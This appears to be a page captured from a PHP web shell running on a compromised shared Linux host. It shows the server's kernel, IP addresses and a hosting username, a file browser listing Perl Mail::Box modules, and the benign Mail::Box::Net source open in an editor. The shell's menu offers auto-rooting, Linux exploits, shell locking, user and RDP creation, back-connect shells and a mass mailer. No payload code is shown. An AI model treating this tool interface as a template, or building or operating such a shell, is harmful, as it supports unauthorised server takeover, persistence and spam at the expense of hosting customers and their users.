Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
Mail /
Box /
[ HOME SHELL ]
Name
Size
Permission
Action
Dir
[ DIR ]
drwxr-xr-x
File
[ DIR ]
drwxr-xr-x
Locker
[ DIR ]
drwxr-xr-x
MH
[ DIR ]
drwxr-xr-x
Maildir
[ DIR ]
drwxr-xr-x
Manage
[ DIR ]
drwxr-xr-x
Mbox
[ DIR ]
drwxr-xr-x
Message
[ DIR ]
drwxr-xr-x
Net
[ DIR ]
drwxr-xr-x
Parser
[ DIR ]
drwxr-xr-x
Search
[ DIR ]
drwxr-xr-x
Thread
[ DIR ]
drwxr-xr-x
Tie
[ DIR ]
drwxr-xr-x
Collection.pm
1.81
KB
-rw-r--r--
Collection.pod
8.81
KB
-rw-r--r--
Dir.pm
3.03
KB
-rw-r--r--
Dir.pod
14.62
KB
-rw-r--r--
FastScalar.pm
4.13
KB
-rw-r--r--
FastScalar.pod
969
B
-rw-r--r--
File.pm
13.08
KB
-rw-r--r--
File.pod
21.55
KB
-rw-r--r--
Identity.pm
5.66
KB
-rw-r--r--
Identity.pod
12.12
KB
-rw-r--r--
Locker.pm
3.3
KB
-rw-r--r--
Locker.pod
8.57
KB
-rw-r--r--
MH.pm
11.23
KB
-rw-r--r--
MH.pod
19.9
KB
-rw-r--r--
Maildir.pm
10.3
KB
-rw-r--r--
Maildir.pod
17.54
KB
-rw-r--r--
Manager.pm
15.14
KB
-rw-r--r--
Manager.pod
21.18
KB
-rw-r--r--
Mbox.pm
5.72
KB
-rw-r--r--
Mbox.pod
19.23
KB
-rw-r--r--
Message.pm
2.6
KB
-rw-r--r--
Message.pod
17.92
KB
-rw-r--r--
Net.pm
2.55
KB
-rw-r--r--
Net.pod
13.55
KB
-rw-r--r--
Parser.pm
3.77
KB
-rw-r--r--
Parser.pod
10.76
KB
-rw-r--r--
Search.pm
5.06
KB
-rw-r--r--
Search.pod
9.12
KB
-rw-r--r--
Test.pm
8.36
KB
-rw-r--r--
Tie.pm
923
B
-rw-r--r--
Tie.pod
1.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Net.pm
# Copyrights 2001-2020 by [Mark Overmeer]. # For other contributors see ChangeLog. # See the manual pages for details on the licensing terms. # Pod stripped from pm file by OODoc 2.02. # This code is part of distribution Mail-Box. Meta-POD processed with # OODoc into POD and HTML manual-pages. See README.md # Copyright Mark Overmeer. Licensed under the same terms as Perl itself. package Mail::Box::Net; use vars '$VERSION'; $VERSION = '3.009'; use strict; use warnings; use base 'Mail::Box'; use Mail::Box::Net::Message; use Mail::Message::Body::Lines; use Mail::Message::Body::File; use Mail::Message::Body::Delayed; use Mail::Message::Body::Multipart; use Mail::Message::Head; use Mail::Message::Head::Delayed; use Carp; use File::Copy; use File::Spec; use File::Basename; sub init($) { my ($self, $args) = @_; $args->{lock_type} ||= 'NONE'; $args->{body_type} ||= 'Mail::Message::Body::Lines'; $args->{trusted} ||= 0; my ($scheme, $s, $port, $u, $pwd, $f); if(my $d = $args->{folderdir}) { # cannot use URI, because some scheme's are fake ($scheme, $u, $pwd, $s, $port, $f) = $d =~ m! ^ (\w+) \:// # scheme (?: ( [^:\@/]+ ) # username (?: \: ( [^\@/]+ ))? # password \@ )? ( [a-zA-Z0-9.-]+ )? # hostname (?: \: ([0-9]+) )? # port ( / .* )? # path !x; $args->{folderdir} =~ s!/$!!; } $args->{folder} ||= $f || '/'; $self->SUPER::init($args); $self->{MBN_hostname} = $args->{server_name} || $s; $self->{MBN_port} = $args->{server_port} || $port; $self->{MBN_username} = $args->{username} || $u; $self->{MBN_password} = $args->{password} || $pwd; $self->log(WARNING => "The term 'hostname' is confusing wrt folder. You probably need 'server_name'") if exists $args->{hostname}; $self; } sub create(@) {shift->notImplemented} sub organization() { 'REMOTE' } sub url() { my $self = shift; my ($user, $pass, $host, $port) = @$self{ qw/MBN_username MBN_password MBN_hostname MBN_port/ }; my $perm = ''; $perm = $user if defined $user; if(defined $pass) { $pass =~ s/(\W)/sprintf "%%%02X", ord $1/ge; $perm .= ':'.$pass; } $perm .= '@' if length $perm; my $loc = $host; $loc .= ':'.$port if length $port; my $name = $self->name; $loc .= '/'.$name if $name ne '/'; $self->type . '://' . $perm . $loc; } 1;
Close